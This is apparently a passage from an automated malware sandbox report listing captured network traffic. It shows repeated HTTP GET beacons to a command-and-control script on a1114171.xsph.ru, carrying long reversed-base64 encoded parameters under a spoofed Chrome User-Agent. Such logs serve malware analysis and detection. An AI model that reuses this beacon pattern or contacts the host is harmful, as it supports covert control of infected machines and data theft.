UtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSx0kaNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl&38d296bf10b75f50288ff78c7ce8263b=886958ac912bd532dd3d39de1ccac832&a67d1e031b8c1e808a6c381772ce6495=QZ1QWO5EWZzMTMlJGM2MDMhZjZ1EjY1ImM1gTOxMTM2kDZkBzNygTM&m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnFkaNZTQE5kNVRVTnVlaNdXS6xEMBpHT5VkeXJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiImNjNwgDZyEDMwkjYjVDN4ETNyITM4EGNlRWY4EWM1ADMjFjMzIjM2IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=QX9JSOKNlWwY0RadnVGh1YWdkYuljMi5GeGhFcZR0T0g2QJpnVHJGcaVUS0ZUbj5WOtNWU4ZEW200aJZTSDFGMGdUVpdXaJVHZzIWd01mYWpUaPl2ZHRGaCZkW5ljMZpHbHJVa3lWSp9maJ9mUYlVUxcVW5R2VaNnVHZVa3lWSp9maJpnQINmQxcVWsJ1MVl2dplUdkNjY1RXbiZlSp9UaRV1U5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWSYpleWZlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJlnW1Z0RURnRXpFMOxWSzlUaiNTOtJmc1clVp9maJ9mUYlVUxcVWsJ1MVl2dplEaapWWoFzQNRTWq5kMRRUTpRnbMljQE10dBRUT3FERNVXRqx0d0MUT3oUaPlWTYpVd5cUY3lTbjpGbXRVa3lWSp9maJpXMXllaKdlWYp0QMlGNHhVe4ZVTaZURUFlTWNVR4ZEW1dnRYNGeslkNJl3Y1Z1ValnTyUVa3lWS1R2MiVHdtJmVKl2TpFkVT9kRFRVa3lWSDRWRJBTSp9UawUVUTp0QMlGNyQmd1ITY1ZFbJZTSDJ2cGJDZspEWhdkSDxUaJhlWrVzVa1mVHJ1ZNNDZ2JVbiBHZslkNJl3YxoEWhJDbHRWdGtWSzlUaOlkUW5kWKl2TpRjMiBnTuNGbaFTVQx2aRl2dplUeBRlT4tGVNRTQE5Ue0MkTyk0aMlXTU5EMJpWTwkkaMdlQE1UdFRUT5NmVUdlSp9UaVdlYoVDMVBFbrFVa3lWS5VlaNh3aU1EMNpmTzUkeNlXSE1EeJl2TpFVVTtmSYlldK12Ysh2RkZXMrl0cJNEVNxmeRZkTVZFSWp2Vp9maJlnVtNWMSNTWop1VkVnRXR1aKhVW2pUbjxGaHRmdxsWSzlUaO1EaVR1MRZkVxUURSl2bqlEbxcVWPJVbjhWOtlVeWdUYwkzVUl2dplEeJhlWzhnMilnUuJmdOBjYsJ1VhdlSp9UaRd1Us50VhJjVHJlVCFjUpdXaJZDaFlEMZpWS2k0UaBjRtV1bOhlW5p1VaNFaYllTWZUVIp0QMlWTuNmd4JjYqJUaOVTS65kMrRkT1kEROd2ZIlEMJRUT4F0QldWQE9UeFpWS2kUaiZHbHR2ds12Yq5EWaVkVHpldxAjYsJ1VhdlVGVFSKNETplEMSdWRqlkNJNVZ5lzVixWMwIGbSdVYXZlRVhkSDxUaRVkTTRmeNl2bqlUe5IzY6ZlMZZnSIVldWdkWwplVWFFZrl0cJNlTp9maJxmSYRGMOdlWww2RhpmSYFldWdkWwplVWFFZrl0cJlmV4VFMRVFZrlkNJNlW0ZUbUZlQxIVa3lWSFJFVRFzZq5EenRUT1kUaPlWUXNVe5IzY6ZlMZZnSIVlVCFTUpdXaJdXVGVFRKl2TpF1VTxmTXFmMWdkUWJUMRl2dD1kNJlmY2xmMjBnWYp1UWZUVEp0QMl2bINlTCNUT3FkaNl2bql0aWdlW35UMhpWOHJGRS5mYspkbjFjTVZVUOtWSzl0URZHNrlkNJNkWsZ1RjRFdykld4JTUzZUbilnVHRGNWVlVR50aJNXSpFFc0VUS3FFROhXWqlkNJNlW2wmMVxGaykFaOBTTNZlRVRkSDxUaJVVYMJ0QPBTQq1UavpWSsBHWhRlVHFmaGJTU5dXVWFlTrl0cJN1Tp9maJxmSYRGMOdlWww2RhpmSYFlVCFTUpd3UNZTS5NWe5IzY6ZlMZZnSIV1cGJTWwRmMi1kVGVFRKNETw8maJpnVtNmdOVlVR50aJNXSD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXNVavpWS1lzVhBjQYFWeOJzYsJVVWFlTrl0cJlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULN